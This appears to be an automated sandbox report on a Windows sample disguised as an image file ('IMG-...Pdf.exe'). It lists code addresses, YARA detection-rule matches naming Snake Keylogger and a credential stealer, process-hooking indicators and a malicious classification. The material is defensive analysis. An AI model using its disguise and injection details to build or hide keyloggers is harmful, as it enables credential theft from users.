Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_01196730	5_2_01196730
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_0119C751	5_2_0119C751
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_01199858	5_2_01199858
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_0119BBD2	5_2_0119BBD2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_0119CA31	5_2_0119CA31
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_01194AD9	5_2_01194AD9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_0119BEB0	5_2_0119BEB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_0119E517	5_2_0119E517
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_0119E528	5_2_0119E528
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_01193570	5_2_01193570
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_0119B4F2	5_2_0119B4F2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_05048460	5_2_05048460
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_05040900	5_2_05040900
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_050411C0	5_2_050411C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_05040040	5_2_05040040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_05043870	5_2_05043870
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_05047B70	5_2_05047B70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_0504ED50	5_2_0504ED50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_05040D51	5_2_05040D51
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_05040D60	5_2_05040D60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_0504ED60	5_2_0504ED60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_0504BD88	5_2_0504BD88
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_05047D90	5_2_05047D90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_0504BD98	5_2_0504BD98
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_0504DC00	5_2_0504DC00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_05040490	5_2_05040490
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_050404A0	5_2_050404A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_0504E4A0	5_2_0504E4A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_0504E4B0	5_2_0504E4B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_0504B4D7	5_2_0504B4D7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_0504B4E8	5_2_0504B4E8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_0504D798	5_2_0504D798
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_0504D7A8	5_2_0504D7A8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_0504F600	5_2_0504F600
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_0504F610	5_2_0504F610
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_0504C638	5_2_0504C638
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_0504C648	5_2_0504C648
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_0504CEEA	5_2_0504CEEA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_0504CEF8	5_2_0504CEF8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_0504E908	5_2_0504E908
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_0504B930	5_2_0504B930
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_0504B940	5_2_0504B940
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_0504F1A9	5_2_0504F1A9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_050411B0	5_2_050411B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_0504F1B8	5_2_0504F1B8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_0504C1E0	5_2_0504C1E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_0504C1F0	5_2_0504C1F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_05040006	5_2_05040006
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_0504E049	5_2_0504E049
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_0504E058	5_2_0504E058
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_05043860	5_2_05043860
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_050408F0	5_2_050408F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_0504E8F8	5_2_0504E8F8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_0504D340	5_2_0504D340
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_0504D350	5_2_0504D350
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_050473D8	5_2_050473D8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_050473E8	5_2_050473E8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_0504DBF1	5_2_0504DBF1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_0504FA59	5_2_0504FA59
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_0504FA68	5_2_0504FA68
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_0504CA90	5_2_0504CA90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_0504CAA0	5_2_0504CAA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_0640AA58	5_2_0640AA58
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_0640D670	5_2_0640D670
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_06408608	5_2_06408608
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_0640B6E8	5_2_0640B6E8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_0640C388	5_2_0640C388
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_06408C51	5_2_06408C51
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_0640A408	5_2_0640A408
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_0640D028	5_2_0640D028
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_0640B0A0	5_2_0640B0A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_0640BD38	5_2_0640BD38
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_0640C9D8	5_2_0640C9D8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_064011A0	5_2_064011A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_0640AA48	5_2_0640AA48
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_06405A60	5_2_06405A60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_0640D662	5_2_0640D662
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_06405A70	5_2_06405A70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_0640560A	5_2_0640560A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_06405618	5_2_06405618
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_06405EC8	5_2_06405EC8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_0640B6D9	5_2_0640B6D9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_06405EB8	5_2_06405EB8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_0640676A	5_2_0640676A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_06406778	5_2_06406778
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_0640C378	5_2_0640C378
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_06406312	5_2_06406312
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_06406320	5_2_06406320
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_06403730	5_2_06403730
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_06406BC1	5_2_06406BC1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_06406BD0	5_2_06406BD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_0640A3F8	5_2_0640A3F8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_064033A8	5_2_064033A8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_064033B8	5_2_064033B8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_06400040	5_2_06400040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_06407040	5_2_06407040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_06407050	5_2_06407050
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_06400006	5_2_06400006
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_06402807	5_2_06402807
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_06402809	5_2_06402809
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_0640D018	5_2_0640D018
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_06404430	5_2_06404430
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_064008E0	5_2_064008E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_064008F0	5_2_064008F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_064078F0	5_2_064078F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_06400488	5_2_06400488
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_0640B08F	5_2_0640B08F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_06407497	5_2_06407497
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_06400498	5_2_06400498
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_064074A8	5_2_064074A8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_064028B0	5_2_064028B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_06400D48	5_2_06400D48
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_06407D48	5_2_06407D48
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_06407D58	5_2_06407D58
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_06407900	5_2_06407900
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_0640BD28	5_2_0640BD28
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_06400D39	5_2_06400D39
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_0640C9C8	5_2_0640C9C8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_064085FC	5_2_064085FC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_0640518A	5_2_0640518A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_06401191	5_2_06401191
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_06405198	5_2_06405198
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_064081A0	5_2_064081A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_064081B0	5_2_064081B0

Source: C:\Users\user\Desktop\IMG-20241119-WA0006(162KB).Pdf.exe	Code function: String function: 0009EC2F appears 68 times
Source: C:\Users\user\Desktop\IMG-20241119-WA0006(162KB).Pdf.exe	Code function: String function: 000AF8A0 appears 35 times
Source: C:\Users\user\Desktop\IMG-20241119-WA0006(162KB).Pdf.exe	Code function: String function: 000A6AC0 appears 42 times
Source: C:\Users\user\AppData\Local\Wausaukee\silvexes.exe	Code function: String function: 00BD6AC0 appears 42 times
Source: C:\Users\user\AppData\Local\Wausaukee\silvexes.exe	Code function: String function: 00BDF8A0 appears 35 times
Source: C:\Users\user\AppData\Local\Wausaukee\silvexes.exe	Code function: String function: 00BCEC2F appears 68 times

Source: IMG-20241119-WA0006(162KB).Pdf.exe

Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE

Source: 4.2.silvexes.exe.19a0000.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 4.2.silvexes.exe.19a0000.1.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 4.2.silvexes.exe.19a0000.1.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 4.2.silvexes.exe.19a0000.1.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 1.2.silvexes.exe.1e60000.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 1.2.silvexes.exe.1e60000.1.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 1.2.silvexes.exe.1e60000.1.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 1.2.silvexes.exe.1e60000.1.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 4.2.silvexes.exe.19a0000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 4.2.silvexes.exe.19a0000.1.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 4.2.silvexes.exe.19a0000.1.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 4.2.silvexes.exe.19a0000.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 1.2.silvexes.exe.1e60000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 1.2.silvexes.exe.1e60000.1.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 1.2.silvexes.exe.1e60000.1.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 1.2.silvexes.exe.1e60000.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 00000002.00000002.4119734142.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000002.00000002.4119734142.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 00000004.00000002.1825098136.00000000019A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000004.00000002.1825098136.00000000019A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000004.00000002.1825098136.00000000019A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 00000004.00000002.1825098136.00000000019A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 00000001.00000002.1698528045.0000000001E60000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000001.00000002.1698528045.0000000001E60000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000001.00000002.1698528045.0000000001E60000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 00000001.00000002.1698528045.0000000001E60000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: Process Memory Space: silvexes.exe PID: 7444, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: silvexes.exe PID: 7444, type: MEMORYSTR	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: Process Memory Space: RegSvcs.exe PID: 7488, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: RegSvcs.exe PID: 7488, type: MEMORYSTR	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: Process Memory Space: silvexes.exe PID: 7676, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: silvexes.exe PID: 7676, type: MEMORYSTR	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger

Source: 1.2.silvexes.exe.1e60000.1.raw.unpack, --.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 1.2.silvexes.exe.1e60000.1.raw.unpack, --.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 1.2.silvexes.exe.1e60000.1.raw.unpack, ---.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 1.2.silvexes.exe.1e60000.1.raw.unpack, ---.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 4.2.silvexes.exe.19a0000.1.raw.unpack, --.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 4.2.silvexes.exe.19a0000.1.raw.unpack, --.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 4.2.silvexes.exe.19a0000.1.raw.unpack, ---.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 4.2.silvexes.exe.19a0000.1.raw.unpack, ---.cs	Cryptographic APIs: 'TransformFinalBlock'

Source: 1.2.silvexes.exe.1e60000.1.raw.unpack, --.cs	Base64 encoded string: 'ugYZNFHBX1gtwSJ/5/BgZt4cSGReV4CVQZf60jUlJfrgVSLgm1hTxS/WnzjjWfSh'
Source: 4.2.silvexes.exe.19a0000.1.raw.unpack, --.cs	Base64 encoded string: 'ugYZNFHBX1gtwSJ/5/BgZt4cSGReV4CVQZf60jUlJfrgVSLgm1hTxS/WnzjjWfSh'

Source: classification engine

Classification label: mal100.troj.spyw.expl.evad.winEXE@10/6@2/2

